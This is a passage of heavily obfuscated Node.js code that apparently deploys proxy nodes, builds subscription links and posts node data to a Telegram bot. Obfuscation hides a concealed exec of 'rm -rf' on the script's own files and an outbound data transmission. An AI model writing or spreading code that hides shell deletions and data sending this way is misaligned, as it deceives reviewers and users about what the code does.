_0x4d889e=_0x17cde5(-_0xb23d16._0x31584c,-_0xb23d16._0x5ee3fd,-0x16,_0xb23d16._0x9a00c0)+Buffer[_0x17cde5(-0x2c6,-_0xb23d16._0x10365a,-_0xb23d16._0x28fc78,-0x136)](JSON['stringify'](_0x20fce8))[_0x17cde5(-_0xb23d16._0x29c5e1,-_0xb23d16._0xdcc798,_0xb23d16._0x53f0ef,_0xb23d16._0x1827ef)](_0x4db2a7[_0x17cde5(-_0xb23d16._0x28fc78,-_0xb23d16._0x2530ea,-0x18e,-_0xb23d16._0x491136)]);let _0x24450f=_0x4d889e;if(_0x4db2a7[_0x17cde5(_0xb23d16._0xe796d9,-_0xb23d16._0x7430b6,-_0xb23d16._0x465b96,-_0xb23d16._0x51745e)](isValidPort,TUIC_PORT)){if(_0x4db2a7['Wzwcc']!==_0x4db2a7['FqdaG']){const _0x1f2dfc=_0x288b28(-_0xb23d16._0x1701d6,-_0xb23d16._0x1e0d78,-0x227,-_0xb23d16._0x189b17)+UUID+':@'+_0x5d33be+':'+TUIC_PORT+_0x17cde5(_0xb23d16._0x4e265d,-_0xb23d16._0x45edde,-0x90,-_0xb23d16._0x45cfdf)+_0x571f7c;_0x24450f+=_0x1f2dfc;}else _0x2adee8[_0x288b28(_0xb23d16._0x357f8a,_0xb23d16._0x4661f7,_0xb23d16._0x47d930,-0x158)](_0x20516f,_0x2adee8[_0x17cde5(_0xb23d16._0x3494e4,-_0xb23d16._0x2b1da5,_0xb23d16._0x4383f5,-_0xb23d16._0xdb0e49)](_0x50dafe,_0x1be129));}if(_0x4db2a7[_0x288b28(-_0xb23d16._0x32b6bc,-_0xb23d16._0x251a80,-_0xb23d16._0x43c7bb,-_0xb23d16._0x47e0d3)](isValidPort,HY2_PORT)){if(_0x4db2a7['oncJU']('UHylA',_0x4db2a7[_0x288b28(-_0xb23d16._0xee1876,-_0xb23d16._0x4ae8b0,-_0xb23d16._0x2e80a0,-_0xb23d16._0x282a8c)])){const _0x1c3ac6=_0x288b28(_0xb23d16._0x2a8cbd,-_0xb23d16._0x5af8f9,-0x119,-_0xb23d16._0x599876)+UUID+'@'+_0x5d33be+':'+HY2_PORT+_0x288b28(-_0xb23d16._0x295f00,-0x4e,-0x14,_0xb23d16._0x5f2a7c)+_0x571f7c;_0x24450f+=_0x1c3ac6;}else return null;}if(_0x4db2a7['PFGBy'](isValidPort,REALITY_PORT)){const _0x3b7445=_0x288b28(-_0xb23d16._0x7be7d9,-_0xb23d16._0x198e49,-_0xb23d16._0x506730,_0xb23d16._0x10b0c3)+UUID+'@'+_0x5d33be+':'+REALITY_PORT+'?encryption=none&flow=xtls-rprx-vision&security=reality&sni=www.iij.ad.jp&fp=firefox&pbk='+publicKey+_0x288b28(-_0xb23d16._0x5ac9f9,-0x12d,0x2a,-0xba)+_0x571f7c;_0x24450f+=_0x3b7445;}console['log'](Buffer[_0x17cde5(-_0xb23d16._0x2d6584,-_0xb23d16._0x1d9eeb,-_0xb23d16._0x48fd0b,-_0xb23d16._0x5efc18)](_0x24450f)[_0x17cde5(-_0xb23d16._0x5773ad,-0x24,-_0xb23d16._0x317150,-_0xb23d16._0x59a367)](_0x4db2a7['dtUCv'])),fs[_0x288b28(_0xb23d16._0x2a3fed,-0x5a,_0xb23d16._0x39180b,-_0xb23d16._0x1ad4a3)](subPath,Buffer['from'](_0x24450f)[_0x17cde5(0x4e,-0x24,_0xb23d16._0x2de392,_0xb23d16._0x5d9cd6)](_0x4db2a7[_0x288b28(-_0xb23d16._0x199dd0,-0x1ea,-_0xb23d16._0x207c08,-_0xb23d16._0x1d37ac)])),fs[_0x17cde5(-_0xb23d16._0x1c41f0,0x3,-_0xb23d16._0x25a6e1,_0xb23d16._0x31606d)](listPath,_0x24450f,_0x4db2a7[_0x288b28(_0xb23d16._0x5a1571,_0xb23d16._0x3125a8,_0xb23d16._0x1972f0,_0xb23d16._0x236de2)]),console[_0x17cde5(0x11e,_0xb23d16._0x45edde,0x72,_0xb23d16._0x698e8)](FILE_PATH+_0x17cde5(-_0xb23d16._0x4c9ed7,-_0xb23d16._0x5bd48,-_0xb23d16._0x4e805e,-0x1a5)),sendTelegram(),_0x4db2a7['fTwTU'](uplodNodes),app[_0x17cde5(-_0xb23d16._0x361305,-_0xb23d16._0x360c9c,-_0xb23d16._0x252c13,-_0xb23d16._0x538094)]('/'+SUB_PATH,(_0x297676,_0x36ca83)=>{const _0x20bbb8={_0xdef010:0x170,_0x3645c5:0x195},_0xeca502={_0x3a30f0:0x1c4,_0x325673:0xc1},_0xb8a2cf=Buffer[_0x23440f(-_0x52c549._0x255626,_0x52c549._0x5cb00d,0xbc,-0x96)](_0x24450f)[_0x23440f(_0x52c549._0x28e85d,_0x52c549._0x22646b,_0x52c549._0x110bb2,_0x52c549._0x5ea708)](_0x2adee8[_0x2005d3(_0x52c549._0x22a003,0x132,0x1d6,0x20f)]);function _0x2005d3(_0x28a5e0,_0x1d0d23,_0x544a09,_0x117929){return _0x17cde5(_0x544a09,_0x1d0d23-_0xeca502._0x3a30f0,_0x544a09-0x116,_0x117929-_0xeca502._0x325673);}function _0x23440f(_0x1de8dd,_0x5dabc6,_0x1c5ab2,_0x4132fe){return _0x288b28(_0x1c5ab2,_0x4132fe-_0x20bbb8._0xdef010,_0x1c5ab2-0x0,_0x4132fe-_0x20bbb8._0x3645c5);}_0x36ca83[_0x23440f(_0x52c549._0x169f2f,_0x52c549._0x2288a9,0x31b,_0x52c549._0x13035b)](_0x2005d3(0x66,_0x52c549._0x534ca0,0x58,-_0x52c549._0x416d50),'text/plain;\x20charset=utf-8'),_0x36ca83[_0x2005d3(_0x52c549._0x48ee26,_0x52c549._0x4f6986,_0x52c549._0x579302,_0x52c549._0x132075)](_0xb8a2cf);}),_0x4db2a7[_0x17cde5(_0xb23d16._0x16617e,_0xb23d16._0xc06e9d,_0xb23d16._0x585c95,-0x23)](_0x1620dc,_0x24450f);},-0x1*0xbc3+0xb5*-0x8+0x193b);else{_0x36a800[_0x1dff94(_0x3d93ec._0xaff4e0,0x3bb,0x3fb,0x50c)](_0x11ff0b(_0x3d93ec._0x457748,0x4ed,0x2b7,0x340)+_0x31918f['message']);return;}});}function cleanFiles(){const _0x10c33e={_0x24f678:0x184,_0x1bf9dc:0x2a2,_0x5da493:0xd3,_0x5d6f60:0x5f,_0x50f8d0:0x1f1,_0x818e86:0x2d9,_0x1054f7:0x17d,_0x2743cf:0x218,_0x1ccaa6:0x2ad,_0x3b6f90:0x23b,_0x53926b:0x144,_0x324eac:0x1d8,_0x50c163:0x99,_0x4db87b:0xfd,_0x542bb2:0xcc,_0x709699:0xc0,_0x1e6c07:0x1ed,_0x46a82f:0x10},_0x1a45a5={_0x26e4da:0x5cb,_0x50bc8f:0x6ed,_0x473141:0x5a1,_0x51456e:0x706,_0x1e3b27:0x1dc,_0x19323f:0x3d4,_0x562507:0x310,_0x284068:0x2f9,_0x60fdc2:0x142,_0x503d68:0x1f8,_0x46d14e:0x250,_0x18eb57:0x268,_0x35ce98:0x4d6,_0x361087:0x598,_0xd9d232:0x4e7,_0x51446e:0x44e,_0x350117:0x68,_0x53e226:0xa8,_0x33dff4:0x4f,_0xf927bb:0x48,_0x5f38ba:0x4a1,_0x24bbf0:0x453,_0x4dae34:0x3de,_0x4087bb:0x133,_0x4c4b30:0xf6,_0xa415e4:0x9,_0x511539:0x42,_0x3ffa4f:0x590,_0x106b71:0x599,_0x8626e6:0x546,_0x440eac:0x234,_0x461dfc:0x371,_0x5a0cfd:0x451,_0x5a3db9:0x4fd,_0x142c19:0x458,_0x3ecf4c:0x42d,_0x200ebc:0x23b,_0x3470cd:0x308,_0x586d72:0x70,_0x2e8a41:0x1a,_0xc00f76:0xf2,_0xb606f4:0x1d8,_0x1a7945:0x571,_0x1e08c1:0x4db,_0x5466ea:0x596,_0x1483c7:0x138,_0x294177:0x26,_0x5254a4:0x4e,_0x3e8e47:0x4a1,_0x596f50:0x3b8,_0x11772e:0x3ab,_0x655211:0x2f9,_0xa0a687:0x376,_0x319be4:0x3c8,_0x58ccca:0x388,_0x5dedc5:0x105,_0x24849b:0x1,_0x1ad1a5:0x154,_0x2b7ce7:0xf1,_0xae3bd:0xe3,_0x13b6bf:0x84,_0x2081e9:0x1d2,_0x40bed6:0x12b,_0x2141f6:0x27d,_0xe735ed:0x5af,_0x9b05e5:0x3b1,_0x27b13b:0x4ee,_0x3a0105:0x407,_0x48405d:0x57d,_0x4aa5a9:0x677,_0x5ec3e3:0x497,_0x4fd94e:0x573,_0x2d9e2c:0x429,_0x178132:0x649,_0xdccaff:0x550,_0x35f634:0x34,_0x1c614d:0x12f,_0x2edae6:0x11a,_0x3353f4:0x86,_0x28e90f:0xef,_0x3ae503:0x43,_0x308d17:0x169,_0x10014a:0xcd,_0x4431a8:0x469,_0x3e5430:0x6a7,_0x14713b:0x594,_0x446dd6:0x5a4},_0x1d9ad1={_0x3d479d:0x1f3,_0x3b87e9:0x501,_0x127e38:0x1cb},_0x1b6d1a={_0x523ca0:0x133},_0x114752={_0x4c0504:0x1a9,_0x122165:0x1db,_0x2452e8:0x236},_0xba65f6={'XkgFV':'App\x20is\x20running','kibhq':_0x20ba3f(-0x243,-_0x10c33e._0x24f678,-_0x10c33e._0x1bf9dc,-0x19),'kARbo':function(_0x5543a1,_0x1827c4){return _0x5543a1||_0x1827c4;},'MSuWP':_0x20ba3f(-0xda,-_0x10c33e._0x5da493,-_0x10c33e._0x5d6f60,-_0x10c33e._0x50f8d0),'xVMMO':_0x26b5c3(_0x10c33e._0x818e86,_0x10c33e._0x1054f7,_0x10c33e._0x2743cf,_0x10c33e._0x1ccaa6),'oRGxI':_0x26b5c3(_0x10c33e._0x3b6f90,_0x10c33e._0x53926b,0x15e,_0x10c33e._0x324eac),'LKhxQ':function(_0x2c25a3,_0x48a0aa){return _0x2c25a3&&_0x48a0aa;},'cEJCC':'oLzEP','atEUe':_0x20ba3f(0x83,-_0x10c33e._0x50c163,-_0x10c33e._0x4db87b,-_0x10c33e._0x542bb2),'XBFjU':function(_0x24d5c3,_0x13fafb,_0x159935){return _0x24d5c3(_0x13fafb,_0x159935);}};function _0x26b5c3(_0x32f831,_0x138b12,_0x2c5d85,_0x2d2557){return _0xe14257(_0x32f831-_0x114752._0x4c0504,_0x138b12-_0x114752._0x122165,_0x2c5d85,_0x32f831-_0x114752._0x2452e8);}function _0x20ba3f(_0x293572,_0x41d611,_0x3704fa,_0x1c5c40){return _0xe14257(_0x293572-0x118,_0x41d611-_0x1b6d1a._0x523ca0,_0x1c5c40,_0x41d611-0x30);}_0xba65f6[_0x20ba3f(0x1a7,_0x10c33e._0x709699,_0x10c33e._0x1e6c07,_0x10c33e._0x46a82f)](setTimeout,()=>{const _0x2c4ab4={_0x23e616:0x4f,_0x572f04:0x21f},_0x2d93c3={_0x3ed78e:0x4,_0x138eaf:0x4b,_0x5c6a47:0x8f},_0x467db9={_0x5cedbc:0x31,_0x186483:0x153,_0x29c009:0x111},_0x32a5f0={_0x70071e:0xb,_0xf9432:0x109,_0x33ed17:0x12b,_0x5538be:0x21,_0x47e119:0x75,_0x22a2a5:0x16,_0x3f7542:0xe2},_0x4ba6a5={_0x263a80:0x1e6,_0x229744:0x3ff,_0x1f59b6:0xba},_0x11fef4={_0x2fe2cb:0xda,_0x5527b1:0x97},_0x3d1b24={_0x2a5d3c:0x6dc,_0x36db4e:0x598,_0xdd39a5:0x596,_0x2b9a08:0x522},_0x2dd640={'gOfsv':_0xba65f6[_0xd262fa(_0x1a45a5._0x26e4da,_0x1a45a5._0x50bc8f,_0x1a45a5._0x473141,_0x1a45a5._0x51456e)],'cXDaS':_0xba65f6[_0xd262fa(_0x1a45a5._0x1e3b27,_0x1a45a5._0x19323f,_0x1a45a5._0x562507,_0x1a45a5._0x284068)],'lsoWb':function(_0x5e733e,_0x443069){const _0xa307e6={_0x52de36:0x1c9,_0x429eb8:0x62};function _0x408bf1(_0x3d2f11,_0x48faf4,_0x2628c8,_0x30acaf){return _0x25b849(_0x2628c8-0x579,_0x48faf4,_0x2628c8-_0xa307e6._0x52de36,_0x30acaf-_0xa307e6._0x429eb8);}return _0xba65f6[_0x408bf1(_0x3d1b24._0x2a5d3c,_0x3d1b24._0x36db4e,_0x3d1b24._0xdd39a5,_0x3d1b24._0x2b9a08)](_0x5e733e,_0x443069);},'MLGMj':_0xba65f6[_0x25b849(-_0x1a45a5._0x60fdc2,-_0x1a45a5._0x503d68,-_0x1a45a5._0x46d14e,-_0x1a45a5._0x18eb57)],'VKdqM':_0xd262fa(_0x1a45a5._0x35ce98,_0x1a45a5._0x361087,_0x1a45a5._0xd9d232,_0x1a45a5._0x51446e),'clZjn':_0xba65f6[_0x25b849(_0x1a45a5._0x350117,0x8a,-_0x1a45a5._0x53e226,0x18f)],'ygHVs':_0x25b849(-_0x1a45a5._0x33dff4,0x31,-0x132,-_0x1a45a5._0xf927bb)};function _0xd262fa(_0x561156,_0x544681,_0x37099f,_0x3ea2b3){return _0x20ba3f(_0x561156-_0x1d9ad1._0x3d479d,_0x37099f-_0x1d9ad1._0x3b87e9,_0x37099f-_0x1d9ad1._0x127e38,_0x544681);}function _0x25b849(_0x3a538a,_0x3ea2e7,_0x54eb6a,_0x53b5e6){return _0x20ba3f(_0x3a538a-_0x11fef4._0x2fe2cb,_0x3a538a-_0x11fef4._0x5527b1,_0x54eb6a-0x5b,_0x3ea2e7);}if(_0xd262fa(_0x1a45a5._0x5f38ba,0x401,_0x1a45a5._0x24bbf0,_0x1a45a5._0x4dae34)!==_0xba65f6[_0x25b849(_0x1a45a5._0x4087bb,_0x1a45a5._0x4c4b30,-_0x1a45a5._0xa415e4,_0x1a45a5._0x511539)]){const _0x1658b3=[bootLogPath,configPath,listPath,webPath,botPath,phpPath,npmPath];if(NEZHA_PORT)_0x1658b3[_0xd262fa(0x697,_0x1a45a5._0x3ffa4f,_0x1a45a5._0x106b71,_0x1a45a5._0x8626e6)](npmPath);else{if(_0xba65f6['LKhxQ'](NEZHA_SERVER,NEZHA_KEY)){if(_0xba65f6[_0xd262fa(_0x1a45a5._0x440eac,_0x1a45a5._0x461dfc,0x335,_0x1a45a5._0x5a0cfd)]!==_0xba65f6['atEUe'])_0x1658b3[_0xd262fa(_0x1a45a5._0x5a3db9,_0x1a45a5._0x142c19,_0x1a45a5._0x106b71,_0x1a45a5._0x3ecf4c)](phpPath);else return null;}}const _0x339345=_0x1658b3[_0xd262fa(_0x1a45a5._0x200ebc,0x252,_0x1a45a5._0x3470cd,0x1e0)](_0x561e4b=>{const _0x4ec31e={_0x2da58a:0xf6,_0x359133:0xe1};function _0x5e4fea(_0x472cf0,_0x17480c,_0x2323df,_0x5a0fc5){return _0xd262fa(_0x472cf0-_0x4ba6a5._0x263a80,_0x472cf0,_0x5a0fc5- -_0x4ba6a5._0x229744,_0x5a0fc5-_0x4ba6a5._0x1f59b6);}function _0x5d5fa0(_0xc22e96,_0xe5eea9,_0x5165c8,_0x21e8d4){return _0xd262fa(_0xc22e96-_0x4ec31e._0x2da58a,_0xe5eea9,_0xc22e96- -0x1c0,_0x21e8d4-_0x4ec31e._0x359133);}if([webPath,botPath,phpPath,npmPath][_0x5e4fea(_0x32a5f0._0x70071e,_0x32a5f0._0xf9432,_0x32a5f0._0x33ed17,_0x32a5f0._0x5538be)](_0x561e4b))return _0x561e4b;return path['join'](FILE_PATH,path[_0x5e4fea(-0x106,_0x32a5f0._0x47e119,-_0x32a5f0._0x22a2a5,-_0x32a5f0._0x3f7542)](_0x561e4b));});exec('rm\x20-rf\x20'+_0x339345['join']('\x20')+_0x25b849(-_0x1a45a5._0xf927bb,0x11,-_0x1a45a5._0x586d72,_0x1a45a5._0x2e8a41),_0x2889bd=>{console['clear']();function _0x29605a(_0x5ac65f,_0x5b5e08,_0x148803,_0x12cf31){return _0xd262fa(_0x5ac65f-_0x467db9._0x5cedbc,_0x5ac65f,_0x148803-_0x467db9._0x186483,_0x12cf31-_0x467db9._0x29c009);}function _0x5795c9(_0x4331c7,_0x425f71,_0x138b06,_0xc5e1c6){return _0x25b849(_0x4331c7- -_0x2d93c3._0x3ed78e,_0xc5e1c6,_0x138b06-_0x2d93c3._0x138eaf,_0xc5e1c6-_0x2d93c3._0x5c6a47);}console[_0x5795c9(0xeb,_0x2c4ab4._0x23e616,0x15,_0x2c4ab4._0x572f04)](_0x2dd640[_0x29605a(0x5c6,0x562,0x5f8,0x762)]),console['log'](_0x2dd640['cXDaS']);});}else{if(_0x3fd434){_0x31fd1d[_0x25b849(-_0x1a45a5._0xc00f76,-0xd5,-0x1ea,-_0x1a45a5._0xb606f4)](_0xd262fa(_0x1a45a5._0x1a7945,_0x1a45a5._0x1e08c1,_0x1a45a5._0x5466ea,0x61f)+_0x425101[_0x25b849(-_0x1a45a5._0x1483c7,-0x1ae,_0x1a45a5._0x294177,-_0x1a45a5._0x5254a4)]);return;}const _0x53b95b=_0x1bc4c8[_0xd262fa(_0x1a45a5._0x3e8e47,_0x1a45a5._0x596f50,_0x1a45a5._0x11772e,_0x1a45a5._0x655211)](/PrivateKey:\s*(.*)/),_0x48fdc7=_0x5434a8[_0xd262fa(_0x1a45a5._0xa0a687,_0x1a45a5._0x319be4,0x3ab,_0x1a45a5._0x58ccca)](/PublicKey:\s*(.*)/);_0x3e68aa=_0x53b95b?_0x53b95b[0x19eb+-0xed7+-0x3*0x3b1]:'',_0xea082d=_0x48fdc7?_0x48fdc7[0x22*0x25+-0x333+-0x1b6]:'';if(_0x2dd640[_0x25b849(-_0x1a45a5._0x5dedc5,-_0x1a45a5._0x24849b,-_0x1a45a5._0x1ad1a5,-_0x1a45a5._0x2b7ce7)](!_0x23051a,!_0x4abdc2)){_0x4250f0[_0x25b849(-0xf2,-_0x1a45a5._0xae3bd,-_0x1a45a5._0x13b6bf,-_0x1a45a5._0x2081e9)](_0x2dd640[_0x25b849(_0x1a45a5._0x40bed6,_0x1a45a5._0x2141f6,0xbb,0x8)]);return;}_0x30abe2[_0xd262fa(_0x1a45a5._0xe735ed,_0x1a45a5._0x9b05e5,0x4d1,_0x1a45a5._0x27b13b)](_0x49f02b,_0xd262fa(_0x1a45a5._0x3a0105,0x69e,_0x1a45a5._0x48405d,_0x1a45a5._0x4aa5a9)+_0x23e59d+_0xd262fa(_0x1a45a5._0x5ec3e3,_0x1a45a5._0x4fd94e,0x46c,_0x1a45a5._0x2d9e2c)+_0x2c54dd+'\x0a',_0x2dd640[_0xd262fa(_0x1a45a5._0x178132,0x4f9,_0x1a45a5._0xdccaff,0x513)]),_0x5b481a['log'](_0x2dd640[_0x25b849(_0x1a45a5._0x35f634,-_0x1a45a5._0x1c614d,-_0x1a45a5._0x2edae6,_0x1a45a5._0x3353f4)],_0x25d4b2),_0x2cd3f0[_0x25b849(_0x1a45a5._0x28e90f,_0x1a45a5._0x3ae503,_0x1a45a5._0x308d17,_0x1a45a5._0x10014a)](_0x2dd640[_0xd262fa(_0x1a45a5._0x4431a8,_0x1a45a5._0x3e5430,_0x1a45a5._0x14713b,_0x1a45a5._0x446dd6)],_0x386e72),_0x18a85c();}},0x202e5+-0xf03d*0x1+0x99d*0x8);}async function sendTelegram(){const _0x242615={_0x91079f:0x43c,_0x5f2292:0x5a1,_0x4b72ee:0x35e,_0x367967:0x3e6,_0x77baa:0x357,_0x33dcfa:0x2fe,_0x2d1263:0x313,_0x6f368c:0x429,_0x159c52:0x202,_0x38cc6c:0x30c,_0x8833c1:0x2a2,_0xeb4f90:0x32e,_0x189cfd:0x28d,_0x3b37cb:0x3a0,_0x5052c1:0x4ce,_0x5caf2a:0x470,_0x1cb5ba:0x475,_0x55336b:0x315,_0x546de2:0x441,_0x2ebc5d:0x3e5,_0x338e28:0x4f5,_0x4e77a2:0x3a5,_0x14b189:0x4c4,_0x3a2b63:0x279,_0x2f10f8:0x4f8,_0xa7f8c0:0x4ba,_0xef3852:0x384,_0x3aea78:0x5e5,_0x365f69:0x446,_0x2fe4f5:0x4bf,_0x270d22:0x467,_0x41a205:0x3c9,_0x2b66c8:0x341,_0x43c1be:0x31f,_0x1ec4a3:0x4a8,_0x36f5a6:0x395,_0x5cd96d:0x4b3,_0x37435f:0x368,_0x359c12:0x472,_0x4ed92a:0x41e,_0xb73e09:0x3a6,_0x5d797e:0x35d,_0x4fdbad:0x2c1,_0x10ec61:0x454,_0x522e38:0x4bd,_0x2f3400:0x47c,_0x3eb450:0x44b,_0x250d79:0x429,_0x50cbb6:0x4a9,_0x14c344:0x4ae,_0x13e422:0x476,_0x52e6ea:0x385,_0x3afe63:0x496,_0x29b3f1:0x2eb,_0xd69a32:0x24c,_0x488ef6:0x160,_0x3aefdd:0x260,_0x502403:0x26c,_0x2619f7:0x2de,_0x10aa96:0x340,_0x10253e:0x432,_0x478581:0x431,_0xa9851e:0x40d,_0x5a783a:0x4d5,_0xac8575:0x1d3,_0x43b32f:0x165,_0x19db09:0x20d,_0x43d59c:0x4e6,_0xdc58bf:0x367,_0x5e06a4:0x367,_0x27c04f:0x2d8,_0x21be20:0x31d,_0x5ab9b4:0x3e3,_0x3a8891:0x2ca,_0x3ad878:0x43b,_0x4968f4:0x3be,_0x4fef20:0x3de,_0x13f97d:0x49a,_0x5bd6c2:0x436,_0x51fd5d:0x47e,_0x4cf806:0x520},_0x1fe2fd={_0x5f140a:0x107,_0x209160:0x17c},_0x253c9d={_0x5f08d4:0x141,_0x5920b7:0x456},_0x51feb9={};_0x51feb9[_0x3790d2(_0x242615._0x91079f,_0x242615._0x5f2292,_0x242615._0x4b72ee,_0x242615._0x367967)]=function(_0x3b3850,_0x4de0b0){return _0x3b3850===_0x4de0b0;},_0x51feb9['UBQNa']=_0x3790d2(_0x242615._0x77baa,_0x242615._0x33dcfa,_0x242615._0x2d1263,0x4be);function _0x841e26(_0x4834b7,_0x441a77,_0x52ac53,_0x5edeef){return _0xe14257(_0x4834b7-_0x253c9d._0x5f08d4,_0x441a77-0xda,_0x4834b7,_0x52ac53-_0x253c9d._0x5920b7);}_0x51feb9[_0x841e26(_0x242615._0x6f368c,_0x242615._0x159c52,_0x242615._0x38cc6c,_0x242615._0x8833c1)]='wuoSq',_0x51feb9[_0x841e26(_0x242615._0xeb4f90,_0x242615._0x189cfd,0x328,0x23f)]=_0x841e26(_0x242615._0x3b37cb,_0x242615._0x5052c1,0x374,_0x242615._0x5caf2a),_0x51feb9[_0x841e26(0x3b4,_0x242615._0x1cb5ba,0x476,_0x242615._0x55336b)]=_0x3790d2(_0x242615._0x546de2,_0x242615._0x2ebc5d,0x3f3,_0x242615._0x338e28);function _0x3790d2(_0x2a7abe,_0x4d02c4,_0x5db53d,_0x32dce4){return _0xe14257(_0x2a7abe-_0x1fe2fd._0x5f140a,_0x4d02c4-_0x1fe2fd._0x209160,_0x32dce4,_0x2a7abe-0x48b);}_0x51feb9[_0x3790d2(_0x242615._0x4e77a2,_0x242615._0x14b189,_0x242615._0x3a2b63,_0x242615._0x2f10f8)]=_0x3790d2(_0x242615._0xa7f8c0,_0x242615._0xef3852,0x471,_0x242615._0x3aea78),_0x51feb9['ZxgHW']=_0x3790d2(_0x242615._0x365f69,0x323,0x35d,_0x242615._0x2fe4f5);const _0x40e659=_0x51feb9;if(!BOT_TOKEN||!CHAT_ID){if(_0x40e659['hwsJw'](_0x40e659[_0x3790d2(_0x242615._0x270d22,0x562,_0x242615._0x41a205,0x3b8)],_0x40e659[_0x3790d2(_0x242615._0x2b66c8,_0x242615._0x43c1be,_0x242615._0x1ec4a3,_0x242615._0x36f5a6)])){_0x5d8895[_0x3790d2(_0x242615._0x5cd96d,0x3e5,_0x242615._0x37435f,_0x242615._0x359c12)](_0x3790d2(_0x242615._0x4ed92a,_0x242615._0xb73e09,0x340,0x536));return;}else{console['log'](_0x40e659[_0x3790d2(_0x242615._0x5d797e,_0x242615._0x4fdbad,_0x242615._0x10ec61,_0x242615._0x522e38)]);return;}}try{const _0x430759=fs[_0x841e26(0x540,0x34a,_0x242615._0x2f3400,0x404)](path['join'](FILE_PATH,_0x841e26(0x4f7,_0x242615._0x3eb450,_0x242615._0x250d79,_0x242615._0x50cbb6)),_0x40e659[_0x841e26(0x38c,_0x242615._0x14c344,_0x242615._0x13e422,_0x242615._0x52e6ea)]),_0x4f4019=_0x3790d2(0x384,_0x242615._0x3afe63,_0x242615._0x29b3f1,_0x242615._0xd69a32)+BOT_TOKEN+'/sendMessage',_0x4f7e29=NAME[_0x841e26(_0x242615._0x488ef6,_0x242615._0x3aefdd,_0x242615._0x502403,_0x242615._0x2619f7)](/[_*[\]()~`>#+=|{}.!-]/g,_0x40e659[_0x3790d2(_0x242615._0x4e77a2,0x29d,_0x242615._0x10aa96,_0x242615._0x10253e)]),_0x128f47={};_0x128f47[_0x841e26(0x571,_0x242615._0x478581,_0x242615._0xa9851e,_0x242615._0x5a783a)]=CHAT_ID,_0x128f47[_0x841e26(_0x242615._0xac8575,_0x242615._0x43b32f,0x2c2,_0x242615._0x19db09)]='**'+_0x4f7e29+_0x841e26(_0x242615._0x43d59c,_0x242615._0xdc58bf,0x468,_0x242615._0x5e06a4)+_0x430759+'```',_0x128f47[_0x3790d2(_0x242615._0x27c04f,_0x242615._0x21be20,_0x242615._0x5ab9b4,_0x242615._0x3a8891)]=_0x3790d2(_0x242615._0x3ad878,_0x242615._0x4968f4,0x356,_0x242615._0x4fef20);const _0x3d1a61=_0x128f47,_0xdfcc09={};_0xdfcc09['params']=_0x3d1a61,await axios['post'](_0x4f4019,null,_0xdfcc09),console[_0x841e26(_0x242615._0x13f97d,_0x242615._0x5bd6c2,_0x242615._0x51fd5d,_0x242615._0x4cf806)](_0x40e659['ZxgHW']);}catch(_0x767ce5){console['error']('Failed\x20to\x20send\x20Telegram\x20message',_0x767ce5);}}async function uplodNodes(){const _0x525e2e={_0x22cab9:0xb3,_0x48783b:0x4e,_0x58f615:0x55,_0x2542b9:0x51d,_0x4e9df7:0x459,_0x34548e:0x593,_0x5c8eba:0xf2,_0x1fd461:0x166,_0x575cf1:0x138,_0x50abda:0x100,_0x2dbc6c:0x2fb,_0x2cdfff:0x33e,_0x644a67:0x46a,_0x2a1c5b:0x478,_0x52f6c3:0x473,_0x9ea726:0x55d,_0x37bbea:0x4d2,_0x3e2660:0x40b,_0x5e83f8:0x541,_0x2a94ad:0x558,_0x3e7492:0x5f5,_0x3a3d85:0x435,_0x366782:0x3a7,_0xbc2384:0x448,_0x107bb4:0x41b,_0x33153a:0x4bd,_0x5d83c8:0x412,_0x5a7e14:0x301,_0x4b623b:0x4d1,_0x2ccedc:0x398,_0x27069a:0x42b,_0xd94fff:0x329,_0x5cc313:0x4f7,_0x16847a:0x5a1,_0x8a9909:0x590,_0x26cfb3:0x6fa,_0x1b54e3:0xe5,_0xdb6b98:0x3a,_0x40fe14:0x190,_0x20fd00:0x8d,_0x1533ef:0x106,_0x2de06c:0x202,_0x27ee7a:0x13,_0x1b0b03:0x177,_0x132237:0x167,_0x5f50a1:0x181,_0x40d475:0x11a,_0x229bb3:0x122,_0x502870:0x28f,_0x4c303c:0x183,_0x13de8c:0x8e,_0x3a242f:0x172,_0x37da95:0x673,_0x586775:0x568,_0x42107b:0x4f7,_0x283738:0x119,_0x43ac3c:0x201,_0x4f3de8:0x14,_0x2bad07:0x11a,_0x397675:0x390,_0x145213:0x334,_0x35f6c1:0x488,_0x2bc89c:0x104,_0x30c5d6:0x29,_0x33775e:0xba,_0x1c23e5:0x95,_0x47f9cc:0x161,_0x3b9068:0xf8,_0x3fa490:0xb9,_0x1fb1e7:0x1de,_0x4bc4b6:0x8,_0x115ad1:0xa7,_0x41da24:0x4,_0x3f913c:0x120,_0x5a94f5:0x32,_0x2f4832:0x1,_0x380e22:0x5,_0x3e0e5e:0xa0,_0x45c3c1:0x113,_0x4bb7ce:0xfa,_0x154920:0x680,_0x34395c:0x660,_0x4cdcec:0x2f6,_0x2e8676:0x2bc,_0x6b33f:0x2b4,_0x294023:0x62,_0x4cefdf:0x14,_0x49949d:0xe2,_0x580392:0x164,_0x16fbda:0x107,_0x255f0c:0x7,_0x2376c4:0x521,_0x1d5de9:0x412,_0x40d96f:0x48,_0x5813d2:0xa5,_0x184a00:0x16a,_0x5ee912:0x302,_0x6c1623:0x71,_0x192f1b:0x1b7,_0x12f154:0x6d,_0x3e79d9:0xd7,_0x4db2d3:0x1ba,_0x3b9d36:0x277,_0x253e21:0x24a,_0xfcbb66:0x571,_0x584945:0x55e,_0x34464f:0x452,_0x3b7719:0x485,_0x47e3fe:0x1e1,_0x19bdc9:0x1c3,_0x6ca6c:0x1a9,_0x55f411:0xf,_0x29e825:0xeb,_0x43bcd2:0x1d6,_0x19a78b:0xe,_0x2dcb2a:0x2af,_0x519e3d:0x36c,_0x532518:0x160,_0x3a3c51:0x2a,_0x25d8ff:0xde,_0x3eb329:0x44e,_0x3160f6:0x3e1,_0x30fc40:0x245,_0x3fd428:0x5,_0x1100ed:0x5e,_0x5a2611:0x7a,_0x334dd1:0x101,_0x2d97f7:0x2d3,_0x466d07:0x391,_0x549990:0x475,_0x23bb82:0x2d3,_0xcd9e51:0x390,_0x1b4109:0x33c,_0x5b7d26:0x88,_0x38b36f:0xde,_0x4c4ae8:0xe5,_0x44da97:0x2dc,_0x474f7d:0x344,_0x826eb8:0x31b,_0x475c6c:0x437,_0x5df8f0:0x5ac,_0x5e105b:0x602,_0x17602e:0x4dc,_0x96a7a0:0x214,_0x3f7190:0x79,_0x5253b2:0x6a,_0x1cfddb:0x668,_0x139a04:0x52e,_0x2aff5b:0x554,_0x28913d:0x572,_0x46446f:0x34,_0x55ba56:0x92,_0xfb5637:0xa4,_0x151d0f:0x24,_0x5bbd44:0x